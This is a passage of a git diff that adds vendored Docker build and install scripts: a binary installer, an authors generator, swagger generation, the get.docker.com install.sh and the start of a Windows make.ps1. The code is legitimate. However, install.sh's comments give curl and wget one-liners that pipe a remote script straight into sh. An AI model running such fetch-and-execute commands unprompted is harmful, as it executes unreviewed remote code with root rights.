+	mount -t tmpfs none /tmp
+fi
+
+if [ $# -gt 0 ]; then
+	exec "$@"
+fi
+
+echo >&2 'ERROR: No command specified.'
+echo >&2 'You probably want to run hack/make.sh, or maybe a shell?'
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
new file mode 100755
index 0000000000..8dfcca3946
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+TOMLV_COMMIT=9baf8a8a9f2ed20a8e54160840c492f937eeaf9a
+
+# When updating RUNC_COMMIT, also update runc in vendor.conf accordingly
+RUNC_COMMIT=9df8b306d01f59d3a8029be411de015b7304dd8f
+CONTAINERD_COMMIT=aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1
+TINI_COMMIT=949e6facb77383876aeff8a6944dde66b3089574
+LIBNETWORK_COMMIT=0f534354b813003a754606689722fe253101bc4e
+VNDR_COMMIT=f56bd4504b4fad07a357913687fb652ee54bb3b0
+BINDATA_COMMIT=a0ff2567cfb70903282db057e799fd826784d41d
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
new file mode 100755
index 0000000000..64f2b57da1
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
@@ -0,0 +1,123 @@
+#!/bin/sh
+set -e
+set -x
+
+. $(dirname "$0")/binaries-commits
+
+RM_GOPATH=0
+
+TMP_GOPATH=${TMP_GOPATH:-""}
+
+if [ -z "$TMP_GOPATH" ]; then
+	export GOPATH="$(mktemp -d)"
+	RM_GOPATH=1
+else
+	export GOPATH="$TMP_GOPATH"
+fi
+
+# Do not build with ambient capabilities support
+RUNC_BUILDTAGS="${RUNC_BUILDTAGS:-"seccomp apparmor selinux"}"
+
+install_runc() {
+	echo "Install runc version $RUNC_COMMIT"
+	git clone https://github.com/docker/runc.git "$GOPATH/src/github.com/opencontainers/runc"
+	cd "$GOPATH/src/github.com/opencontainers/runc"
+	git checkout -q "$RUNC_COMMIT"
+	make BUILDTAGS="$RUNC_BUILDTAGS" $1
+	cp runc /usr/local/bin/docker-runc
+}
+
+install_containerd() {
+	echo "Install containerd version $CONTAINERD_COMMIT"
+	git clone https://github.com/docker/containerd.git "$GOPATH/src/github.com/docker/containerd"
+	cd "$GOPATH/src/github.com/docker/containerd"
+	git checkout -q "$CONTAINERD_COMMIT"
+	make $1
+	cp bin/containerd /usr/local/bin/docker-containerd
+	cp bin/containerd-shim /usr/local/bin/docker-containerd-shim
+	cp bin/ctr /usr/local/bin/docker-containerd-ctr
+}
+
+install_proxy() {
+	echo "Install docker-proxy version $LIBNETWORK_COMMIT"
+	git clone https://github.com/docker/libnetwork.git "$GOPATH/src/github.com/docker/libnetwork"
+	cd "$GOPATH/src/github.com/docker/libnetwork"
+	git checkout -q "$LIBNETWORK_COMMIT"
+	go build -ldflags="$PROXY_LDFLAGS" -o /usr/local/bin/docker-proxy github.com/docker/libnetwork/cmd/proxy
+}
+
+install_bindata() {
+    echo "Install go-bindata version $BINDATA_COMMIT"
+    git clone https://github.com/jteeuwen/go-bindata "$GOPATH/src/github.com/jteeuwen/go-bindata"
+    cd $GOPATH/src/github.com/jteeuwen/go-bindata
+    git checkout -q "$BINDATA_COMMIT"
+	go build -o /usr/local/bin/go-bindata github.com/jteeuwen/go-bindata/go-bindata
+}
+
+for prog in "$@"
+do
+	case $prog in
+		tomlv)
+			echo "Install tomlv version $TOMLV_COMMIT"
+			git clone https://github.com/BurntSushi/toml.git "$GOPATH/src/github.com/BurntSushi/toml"
+			cd "$GOPATH/src/github.com/BurntSushi/toml" && git checkout -q "$TOMLV_COMMIT"
+			go build -v -o /usr/local/bin/tomlv github.com/BurntSushi/toml/cmd/tomlv
+			;;
+
+		runc)
+			install_runc static
+			;;
+
+		runc-dynamic)
+			install_runc
+			;;
+
+		containerd)
+			install_containerd static
+			;;
+
+		containerd-dynamic)
+			install_containerd
+			;;
+
+		tini)
+			echo "Install tini version $TINI_COMMIT"
+			git clone https://github.com/krallin/tini.git "$GOPATH/tini"
+			cd "$GOPATH/tini"
+			git checkout -q "$TINI_COMMIT"
+			cmake .
+			make tini-static
+			cp tini-static /usr/local/bin/docker-init
+			;;
+
+		proxy)
+			export CGO_ENABLED=0
+			install_proxy
+			;;
+
+		proxy-dynamic)
+			PROXY_LDFLAGS="-linkmode=external" install_proxy
+			;;
+
+		vndr)
+			echo "Install vndr version $VNDR_COMMIT"
+			git clone https://github.com/LK4D4/vndr.git "$GOPATH/src/github.com/LK4D4/vndr"
+			cd "$GOPATH/src/github.com/LK4D4/vndr"
+			git checkout -q "$VNDR_COMMIT"
+			go build -v -o /usr/local/bin/vndr .
+			;;
+
+        bindata)
+            install_bindata
+            ;;
+
+		*)
+			echo echo "Usage: $0 [tomlv|runc|containerd|tini|proxy]"
+			exit 1
+
+	esac
+done
+
+if [ $RM_GOPATH -eq 1 ]; then
+	rm -rf "$GOPATH"
+fi
diff --git a/vendor/github.com/docker/docker/hack/generate-authors.sh b/vendor/github.com/docker/docker/hack/generate-authors.sh
new file mode 100755
index 0000000000..e78a97f962
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/generate-authors.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")/.."
+
+# see also ".mailmap" for how email addresses and names are deduplicated
+
+{
+	cat <<-'EOH'
+	# This file lists all individuals having contributed content to the repository.
+	# For how it is generated, see `hack/generate-authors.sh`.
+	EOH
+	echo
+	git log --format='%aN <%aE>' | LC_ALL=C.UTF-8 sort -uf
+} > AUTHORS
diff --git a/vendor/github.com/docker/docker/hack/generate-swagger-api.sh b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh
new file mode 100755
index 0000000000..a8e9f818a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+set -eu
+
+swagger generate model -f api/swagger.yaml \
+    -t api -m types --skip-validator -C api/swagger-gen.yaml \
+    -n Volume \
+    -n Port \
+    -n ImageSummary \
+    -n Plugin -n PluginDevice -n PluginMount -n PluginEnv -n PluginInterfaceType \
+    -n ErrorResponse \
+    -n IdResponse \
+    -n ServiceUpdateResponse
+
+swagger generate operation -f api/swagger.yaml \
+    -t api -a types -m types -C api/swagger-gen.yaml \
+    -T api/templates --skip-responses --skip-parameters --skip-validator \
+    -n VolumesList \
+    -n VolumesCreate \
+    -n ContainerCreate \
+    -n ContainerUpdate \
+    -n Authenticate \
+    -n ContainerWait
diff --git a/vendor/github.com/docker/docker/hack/install.sh b/vendor/github.com/docker/docker/hack/install.sh
new file mode 100644
index 0000000000..cc20d69396
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/install.sh
@@ -0,0 +1,484 @@
+#!/bin/sh
+set -e
+#
+# This script is meant for quick & easy install via:
+#   'curl -sSL https://get.docker.com/ | sh'
+# or:
+#   'wget -qO- https://get.docker.com/ | sh'
+#
+# For test builds (ie. release candidates):
+#   'curl -fsSL https://test.docker.com/ | sh'
+# or:
+#   'wget -qO- https://test.docker.com/ | sh'
+#
+# For experimental builds:
+#   'curl -fsSL https://experimental.docker.com/ | sh'
+# or:
+#   'wget -qO- https://experimental.docker.com/ | sh'
+#
+# Docker Maintainers:
+#   To update this script on https://get.docker.com,
+#   use hack/release.sh during a normal release,
+#   or the following one-liner for script hotfixes:
+#     aws s3 cp --acl public-read hack/install.sh s3://get.docker.com/index
+#
+
+url="https://get.docker.com/"
+apt_url="https://apt.dockerproject.org"
+yum_url="https://yum.dockerproject.org"
+gpg_fingerprint="58118E89F3A912897C070ADBF76221572C52609D"
+
+key_servers="
+ha.pool.sks-keyservers.net
+pgp.mit.edu
+keyserver.ubuntu.com
+"
+
+mirror=''
+while [ $# -gt 0 ]; do
+	case "$1" in
+		--mirror)
+			mirror="$2"
+			shift
+			;;
+		*)
+			echo "Illegal option $1"
+			;;
+	esac
+	shift $(( $# > 0 ? 1 : 0 ))
+done
+
+case "$mirror" in
+	AzureChinaCloud)
+		apt_url="https://mirror.azure.cn/docker-engine/apt"
+		yum_url="https://mirror.azure.cn/docker-engine/yum"
+		;;
+esac
+
+command_exists() {
+	command -v "$@" > /dev/null 2>&1
+}
+
+echo_docker_as_nonroot() {
+	if command_exists docker && [ -e /var/run/docker.sock ]; then
+		(
+			set -x
+			$sh_c 'docker version'
+		) || true
+	fi
+	your_user=your-user
+	[ "$user" != 'root' ] && your_user="$user"
+	# intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output
+	cat <<-EOF
+
+	If you would like to use Docker as a non-root user, you should now consider
+	adding your user to the "docker" group with something like:
+
+	  sudo usermod -aG docker $your_user
+
+	Remember that you will have to log out and back in for this to take effect!
+
+	EOF
+}
+
+# Check if this is a forked Linux distro
+check_forked() {
+
+	# Check for lsb_release command existence, it usually exists in forked distros
+	if command_exists lsb_release; then
+		# Check if the `-u` option is supported
+		set +e
+		lsb_release -a -u > /dev/null 2>&1
+		lsb_release_exit_code=$?
+		set -e
+
+		# Check if the command has exited successfully, it means we're in a forked distro
+		if [ "$lsb_release_exit_code" = "0" ]; then
+			# Print info about current distro
+			cat <<-EOF
+			You're using '$lsb_dist' version '$dist_version'.
+			EOF
+
+			# Get the upstream release info
+			lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]')
+			dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]')
+
+			# Print info about upstream distro
+			cat <<-EOF
+			Upstream release is '$lsb_dist' version '$dist_version'.
+			EOF
+		else
+			if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then
+				# We're Debian and don't even know it!
+				lsb_dist=debian
+				dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')"
+				case "$dist_version" in
+					9)
+						dist_version="stretch"
+					;;
+					8|'Kali Linux 2')
+						dist_version="jessie"
+					;;
+					7)
+						dist_version="wheezy"
+					;;
+				esac
+			fi
+		fi
+	fi
+}
+
+rpm_import_repository_key() {
+	local key=$1; shift
+	local tmpdir=$(mktemp -d)
+	chmod 600 "$tmpdir"
+	for key_server in $key_servers ; do
+		gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break
+	done
+	gpg --homedir "$tmpdir" -k "$key" >/dev/null
+	gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key
+	rpm --import "$tmpdir"/repo.key
+	rm -rf "$tmpdir"
+}
+
+semverParse() {
+	major="${1%%.*}"
+	minor="${1#$major.}"
+	minor="${minor%%.*}"
+	patch="${1#$major.$minor.}"
+	patch="${patch%%[-.]*}"
+}
+
+do_install() {
+	architecture=$(uname -m)
+	case $architecture in
+		# officially supported
+		amd64|x86_64)
+			;;
+		# unofficially supported with available repositories
+		armv6l|armv7l)
+			;;
+		# unofficially supported without available repositories
+		aarch64|arm64|ppc64le|s390x)
+			cat 1>&2 <<-EOF
+			Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists.
+			EOF
+			exit 1
+			;;
+		# not supported
+		*)
+			cat >&2 <<-EOF
+			Error: $architecture is not a recognized platform.
+			EOF
+			exit 1
+			;;
+	esac
+
+	if command_exists docker; then
+		version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)"
+		MAJOR_W=1
+		MINOR_W=10
+
+		semverParse $version
+
+		shouldWarn=0
+		if [ $major -lt $MAJOR_W ]; then
+			shouldWarn=1
+		fi
+
+		if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then
+			shouldWarn=1
+		fi
+
+		cat >&2 <<-'EOF'
+			Warning: the "docker" command appears to already exist on this system.
+
+			If you already have Docker installed, this script can cause trouble, which is
+			why we're displaying this warning and provide the opportunity to cancel the
+			installation.
+
+			If you installed the current Docker package using this script and are using it
+		EOF
+
+		if [ $shouldWarn -eq 1 ]; then
+			cat >&2 <<-'EOF'
+			again to update Docker, we urge you to migrate your image store before upgrading
+			to v1.10+.
+
+			You can find instructions for this here:
+			https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration
+			EOF
+		else
+			cat >&2 <<-'EOF'
+			again to update Docker, you can safely ignore this message.
+			EOF
+		fi
+
+		cat >&2 <<-'EOF'
+
+			You may press Ctrl+C now to abort this script.
+		EOF
+		( set -x; sleep 20 )
+	fi
+
+	user="$(id -un 2>/dev/null || true)"
+
+	sh_c='sh -c'
+	if [ "$user" != 'root' ]; then
+		if command_exists sudo; then
+			sh_c='sudo -E sh -c'
+		elif command_exists su; then
+			sh_c='su -c'
+		else
+			cat >&2 <<-'EOF'
+			Error: this installer needs the ability to run commands as root.
+			We are unable to find either "sudo" or "su" available to make this happen.
+			EOF
+			exit 1
+		fi
+	fi
+
+	curl=''
+	if command_exists curl; then
+		curl='curl -sSL'
+	elif command_exists wget; then
+		curl='wget -qO-'
+	elif command_exists busybox && busybox --list-modules | grep -q wget; then
+		curl='busybox wget -qO-'
+	fi
+
+	# check to see which repo they are trying to install from
+	if [ -z "$repo" ]; then
+		repo='main'
+		if [ "https://test.docker.com/" = "$url" ]; then
+			repo='testing'
+		elif [ "https://experimental.docker.com/" = "$url" ]; then
+			repo='experimental'
+		fi
+	fi
+
+	# perform some very rudimentary platform detection
+	lsb_dist=''
+	dist_version=''
+	if command_exists lsb_release; then
+		lsb_dist="$(lsb_release -si)"
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then
+		lsb_dist="$(. /etc/lsb-release && echo "$DISTRIB_ID")"
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then
+		lsb_dist='debian'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then
+		lsb_dist='fedora'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then
+		lsb_dist='oracleserver'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then
+		lsb_dist='centos'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then
+		lsb_dist='redhat'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then
+		lsb_dist='photon'
+	fi
+	if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then
+		lsb_dist="$(. /etc/os-release && echo "$ID")"
+	fi
+
+	lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')"
+
+	# Special case redhatenterpriseserver
+	if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then
+        	# Set it to redhat, it will be changed to centos below anyways
+        	lsb_dist='redhat'
+	fi
+
+	case "$lsb_dist" in
+
+		ubuntu)
+			if command_exists lsb_release; then
+				dist_version="$(lsb_release --codename | cut -f2)"
+			fi
+			if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then
+				dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")"
+			fi
+		;;
+
+		debian|raspbian)
+			dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')"
+			case "$dist_version" in
+				8)
+					dist_version="jessie"
+				;;
+				7)
+					dist_version="wheezy"
+				;;
+			esac
+		;;
+
+		oracleserver)
+			# need to switch lsb_dist to match yum repo URL
+			lsb_dist="oraclelinux"
+			dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')"
+		;;
+
+		fedora|centos|redhat)
+			dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)"
+		;;
+
+		"vmware photon")
+			lsb_dist="photon"
+			dist_version="$(. /etc/os-release && echo "$VERSION_ID")"
+		;;
+
+		*)
+			if command_exists lsb_release; then
+				dist_version="$(lsb_release --codename | cut -f2)"
+			fi
+			if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then
+				dist_version="$(. /etc/os-release && echo "$VERSION_ID")"
+			fi
+		;;
+
+
+	esac
+
+	# Check if this is a forked Linux distro
+	check_forked
+
+	# Run setup for each distro accordingly
+	case "$lsb_dist" in
+		ubuntu|debian|raspbian)
+			export DEBIAN_FRONTEND=noninteractive
+
+			did_apt_get_update=
+			apt_get_update() {
+				if [ -z "$did_apt_get_update" ]; then
+					( set -x; $sh_c 'sleep 3; apt-get update' )
+					did_apt_get_update=1
+				fi
+			}
+
+			if [ "$lsb_dist" != "raspbian" ]; then
+				# aufs is preferred over devicemapper; try to ensure the driver is available.
+				if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then
+					if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then
+						kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual"
+
+						apt_get_update
+						( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true
+
+						if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then
+							echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)'
+							echo >&2 ' but we still have no AUFS.  Docker may not work. Proceeding anyways!'
+							( set -x; sleep 10 )
+						fi
+					else
+						echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual'
+						echo >&2 ' package.  We have no AUFS support.  Consider installing the packages'
+						echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.'
+						( set -x; sleep 10 )
+					fi
+				fi
+			fi
+
+			# install apparmor utils if they're missing and apparmor is enabled in the kernel
+			# otherwise Docker will fail to start
+			if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then
+				if command -v apparmor_parser >/dev/null 2>&1; then
+					echo 'apparmor is enabled in the kernel and apparmor utils were already installed'
+				else
+					echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..'
+					apt_get_update
+					( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' )
+				fi
+			fi
+
+			if [ ! -e /usr/lib/apt/methods/https ]; then
+				apt_get_update
+				( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' )
+			fi
+			if [ -z "$curl" ]; then
+				apt_get_update
+				( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' )
+				curl='curl -sSL'
+			fi
+			if ! command -v gpg > /dev/null; then
+				apt_get_update
+				( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' )
+			fi
+
+			# dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464
+			if ! command -v dirmngr > /dev/null; then
+				apt_get_update
+				( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' )
+			fi
+
+			(
+			set -x
+			for key_server in $key_servers ; do
+				$sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break
+			done
+			$sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null"
+			$sh_c "mkdir -p /etc/apt/sources.list.d"
+			$sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list"
+			$sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine'
+			)
+			echo_docker_as_nonroot
+			exit 0
+			;;
+
+		fedora|centos|redhat|oraclelinux|photon)
+			if [ "${lsb_dist}" = "redhat" ]; then
+				# we use the centos repository for both redhat and centos releases
+				lsb_dist='centos'
+			fi
+			$sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF
+			[docker-${repo}-repo]
+			name=Docker ${repo} Repository
+			baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version}
+			enabled=1
+			gpgcheck=1
+			gpgkey=${yum_url}/gpg
+			EOF
+			if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then
+				(
+					set -x
+					$sh_c 'sleep 3; dnf -y -q install docker-engine'
+				)
+			elif [ "$lsb_dist" = "photon" ]; then
+				(
+					set -x
+					$sh_c 'sleep 3; tdnf -y install docker-engine'
+				)
+			else
+				(
+					set -x
+					$sh_c 'sleep 3; yum -y -q install docker-engine'
+				)
+			fi
+			echo_docker_as_nonroot
+			exit 0
+			;;
+	esac
+
+	# intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output
+	cat >&2 <<-'EOF'
+
+	  Either your platform is not easily detectable, is not supported by this
+	  installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have
+	  a package for Docker.  Please visit the following URL for more detailed
+	  installation instructions:
+
+	    https://docs.docker.com/engine/installation/
+
+	EOF
+	exit 1
+}
+
+# wrapped up in a function so that we have some protection against only getting
+# half the file during "curl | sh"
+do_install
diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1
new file mode 100644
index 0000000000..14b9603b2e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make.ps1
@@ -0,0 +1,408 @@
+<#
+.NOTES
+    Author:  @jhowardmsft
+
+    Summary: Windows native build script. This is similar to functionality provided
+             by hack\make.sh, but uses native Windows PowerShell semantics. It does
+             not support the full set of options provided by the Linux counterpart.
+             For example:
+
+             - You can't cross-build Linux docker binaries on Windows
+             - Hashes aren't generated on binaries
+             - 'Releasing' isn't supported.
+             - Integration tests. This is because they currently cannot run inside a container,
+               and require significant external setup.
+
+             It does however provided the minimum necessary to support parts of local Windows
+             development and Windows to Windows CI.
+
+             Usage Examples (run from repo root):
+                "hack\make.ps1 -Binary" to build the binaries
+                "hack\make.ps1 -Client" to build just the client 64-bit binary
+                "hack\make.ps1 -TestUnit" to run unit tests
+                "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests
+                "hack\make.ps1 -All" to run everything this script knows about
+
+.PARAMETER Client
+     Builds the client binaries.
+
+.PARAMETER Daemon
+     Builds the daemon binary.
+
+.PARAMETER Binary
+     Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`.
+
+.PARAMETER Race
+     Use -race in go build and go test.
+
+.PARAMETER Noisy
+     Use -v in go build.
+
+.PARAMETER ForceBuildAll
+     Use -a in go build.
+
+.PARAMETER NoOpt
+     Use -gcflags -N -l in go build to disable optimisation (can aide debugging).
+
+.PARAMETER CommitSuffix
+     Adds a custom string to be appended to the commit ID (spaces are stripped).
+
+.PARAMETER DCO
+     Runs the DCO (Developer Certificate Of Origin) test.
+
+.PARAMETER PkgImports
+     Runs the pkg\ directory imports test.
+
+.PARAMETER GoFormat
+     Runs the Go formatting test.
+
+.PARAMETER TestUnit
+     Runs unit tests.
+
+.PARAMETER All
+     Runs everything this script knows about.
+
+
+TODO
+- Unify the head commit
+- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term)
+- Add golint and other checks (swagger maybe?)
+
+#>
+
+
+param(
+    [Parameter(Mandatory=$False)][switch]$Client,
+    [Parameter(Mandatory=$False)][switch]$Daemon,
+    [Parameter(Mandatory=$False)][switch]$Binary,
+    [Parameter(Mandatory=$False)][switch]$Race,
+    [Parameter(Mandatory=$False)][switch]$Noisy,
+    [Parameter(Mandatory=$False)][switch]$ForceBuildAll,
+    [Parameter(Mandatory=$False)][switch]$NoOpt,
+    [Parameter(Mandatory=$False)][string]$CommitSuffix="",
+    [Parameter(Mandatory=$False)][switch]$DCO,
+    [Parameter(Mandatory=$False)][switch]$PkgImports,
+    [Parameter(Mandatory=$False)][switch]$GoFormat,
+    [Parameter(Mandatory=$False)][switch]$TestUnit,
+    [Parameter(Mandatory=$False)][switch]$All
+)
+
+$ErrorActionPreference = "Stop"
+$pushed=$False  # To restore the directory if we have temporarily pushed to one.
+
+# Utility function to get the commit ID of the repository
+Function Get-GitCommit() {
+    if (-not (Test-Path ".\.git")) {
+        # If we don't have a .git directory, but we do have the environment
+        # variable DOCKER_GITCOMMIT set, that can override it.
+        if ($env:DOCKER_GITCOMMIT.Length -eq 0) {
+            Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified."
+        }
+        Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable"
+        return $env:DOCKER_GITCOMMIT
+    }
+    $gitCommit=$(git rev-parse --short HEAD)
+    if ($(git status --porcelain --untracked-files=no).Length -ne 0) {
+        $gitCommit="$gitCommit-unsupported"
+        Write-Host ""
+        Write-Warning "This version is unsupported because there are uncommitted file(s)."
+        Write-Warning "Either commit these changes, or add them to .gitignore."
+        git status --porcelain --untracked-files=no | Write-Warning
+        Write-Host ""
+    }
+    return $gitCommit
+}
+
+# Utility function to get get the current build version of docker
+Function Get-DockerVersion() {
+    if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" }
+    return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim()
+}
+
+# Utility function to determine if we are running in a container or not.
+# In Windows, we get this through an environment variable set in `Dockerfile.Windows`
+Function Check-InContainer() {
+    if ($env:FROM_DOCKERFILE.Length -eq 0) {
+        Write-Host ""
+        Write-Warning "Not running in a container. The result might be an incorrect build."
+        Write-Host ""
+    }
+}
+
+# Utility function to get the commit for HEAD
+Function Get-HeadCommit() {
+    $head = Invoke-Expression "git rev-parse --verify HEAD"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed getting HEAD commit" }
+
+    return $head
+}
+
+# Utility function to get the commit for upstream
+Function Get-UpstreamCommit() {
+    Invoke-Expression "git fetch -q https://github.com/docker/docker.git refs/heads/master"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed fetching" }
+
+    $upstream = Invoke-Expression "git rev-parse --verify FETCH_HEAD"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed getting upstream commit" }
+
+    return $upstream
+}
+
+# Build a binary (client or daemon)
+Function Execute-Build($type, $additionalBuildTags, $directory) {
+    # Generate the build flags
+    $buildTags = "autogen"
+    if ($Noisy)                     { $verboseParm=" -v" }
+    if ($Race)                      { Write-Warning "Using race detector"; $raceParm=" -race"}
+    if ($ForceBuildAll)             { $allParm=" -a" }
+    if ($NoOpt)                     { $optParm=" -gcflags "+""""+"-N -l"+"""" }
+    if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) }
+
+    # Do the go build in the appropriate directory
+    # Note -linkmode=internal is required to be able to debug on Windows.
+    # https://github.com/golang/go/issues/14319#issuecomment-189576638
+    Write-Host "INFO: Building $type..."
+    Push-Location $root\cmd\$directory; $global:pushed=$True
+    $buildCommand = "go build" + `
+                    $raceParm + `
+                    $verboseParm + `
+                    $allParm + `
+                    $optParm + `
+                    " -tags """ + $buildTags + """" + `
+                    " -ldflags """ + "-linkmode=internal" + """" + `
+                    " -o $root\bundles\"+$directory+".exe"
+    Invoke-Expression $buildCommand
+    if ($LASTEXITCODE -ne 0) { Throw "Failed to compile $type" }
+    Pop-Location; $global:pushed=$False
+}
+
+
+# Validates the DCO marker is present on each commit
+Function Validate-DCO($headCommit, $upstreamCommit) {
+    Write-Host "INFO: Validating Developer Certificate of Origin..."
+    # Username may only contain alphanumeric characters or dashes and cannot begin with a dash
+    $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+'
+
+    $dcoPrefix="Signed-off-by:"
+    $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$"
+
+    $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" }
+
+    # Counts of adds and deletes after removing multiple white spaces. AWK anyone? :(
+    $adds=0; $dels=0; $($counts -replace '\s+', ' ') | %{ 
+        $a=$_.Split(" "); 
+        if ($a[0] -ne "-") { $adds+=[int]$a[0] }
+        if ($a[1] -ne "-") { $dels+=[int]$a[1] }
+    }
+    if (($adds -eq 0) -and ($dels -eq 0)) { 
+        Write-Warning "DCO validation - nothing to validate!"
+        return
+    }
+
+    $commits = Invoke-Expression "git log  $upstreamCommit..$headCommit --format=format:%H%n"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed git log --format" }
+    $commits = $($commits -split '\s+' -match '\S')
+    $badCommits=@()
+    $commits | %{
+        # Skip commits with no content such as merge commits etc
+        if ($(git log -1 --format=format: --name-status $_).Length -gt 0) {
+            # Ignore exit code on next call - always process regardless
+            $commitMessage = Invoke-Expression "git log -1 --format=format:%B --name-status $_"
+            if (($commitMessage -match $dcoRegex).Length -eq 0) { $badCommits+=$_ }
+        }
+    }
+    if ($badCommits.Length -eq 0) {
+        Write-Host "Congratulations!  All commits are properly signed with the DCO!"
+    } else {
+        $e = "`nThese commits do not have a proper '$dcoPrefix' marker:`n"
+        $badCommits | %{ $e+=" - $_`n"}
+        $e += "`nPlease amend each commit to include a properly formatted DCO marker.`n`n"
+        $e += "Visit the following URL for information about the Docker DCO:`n"
+        $e += "https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work`n"
+        Throw $e
+    }
+}
+
+# Validates that .\pkg\... is safely isolated from internal code
+Function Validate-PkgImports($headCommit, $upstreamCommit) {
+    Write-Host "INFO: Validating pkg import isolation..."
+
+    # Get a list of go source-code files which have changed under pkg\. Ignore exit code on next call - always process regardless
